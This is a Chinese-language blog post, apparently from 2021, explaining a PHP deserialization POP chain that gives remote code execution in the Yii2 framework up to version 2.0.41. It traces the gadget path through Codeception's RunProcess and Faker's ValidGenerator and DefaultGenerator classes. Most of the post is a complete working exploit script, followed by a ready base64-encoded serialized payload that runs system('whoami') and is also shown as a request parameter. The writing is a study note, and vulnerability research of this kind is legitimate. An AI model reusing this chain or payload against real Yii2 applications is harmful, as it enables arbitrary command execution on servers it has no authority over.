Yii2 反序列化远程代码执行 POP链

前言:巩固POP链

影响版本:yii2 version <= 2.0.41

搭建的时候注意出现 Unable to verify your data submission,只需要在对应的控制器下填上public $enableCsrfValidation=false;,关闭CSRF验证即可

翻看了下__destruct,能够利用的好像也就只有RunProcess类了,其他类基本都给设定了__wakeup来限制反序列化

跟进stopProcess函数,如下所示,$this->processes可控,那么也就是$process可控,从而$process->isRunning()可以调用任意类的__call方法

找到一个__call的方法满足我们的需求,ValidGenerator类中的__call方法,可以看到 $this->generator $this->validator $this->maxRetries变量都可以控制,如果$res可以控制的话那么就可以执行命令了

通过这条$res = call_user_func_array([$this->generator, $name], $arguments);,我们再找一个__call方法来返回值给$res那么就可以了,这里找的是DefaultGenerator类

构造EXP:

首先用到的第一个类是RunProcess,命名空间是在Codeception\Extension中,且$this->processes可控,内容需要放一个ValidGenerator对象,ValidGenerator对象的构造参数也需要控制

namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
    private $processes = [];
    function __construct($command,$argv)
    {
        $this->processes[] = new ValidGenerator($command,$argv);
    }
}

第二个则是ValidGenerator,DefaultGenerator类,该类的命名空间处于Faker中,且其中的三个属性都需要控制,$this->generator需要DefaultGenerator类的对象,DefaultGenerator对象的构造参数为要执行的命令

namespace Faker;
class DefaultGenerator{
    protected $default ;
    function __construct($argv)
    {
        $this->default = $argv;
    }
}

class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct($command,$argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}

最终的EXP如下:

<?php

namespace Faker;
class DefaultGenerator{
    protected $default ;
    function __construct($argv)
    {
        $this->default = $argv;
    }
}

class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct($command,$argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}


namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
    private $processes = [];
    function __construct($command,$argv)
    {
        $this->processes[] = new ValidGenerator($command,$argv);
    }
}

$exp = new RunProcess('system','whoami');
echo(base64_encode(serialize($exp)));

//TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=

这条POP链比较简单,如下分析:

code=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=

分析到这不由得叹息大佬们还是厉害得,自己去把yii2框架的wakeup和destruct看了下,感觉基本没有可以利用的了,不知道之后会不会再有。。

参考文章:https://xz.aliyun.com/t/9420

posted @ 2021-04-28 16:14  zpchcbd  阅读(92)  评论(0编辑  收藏  举报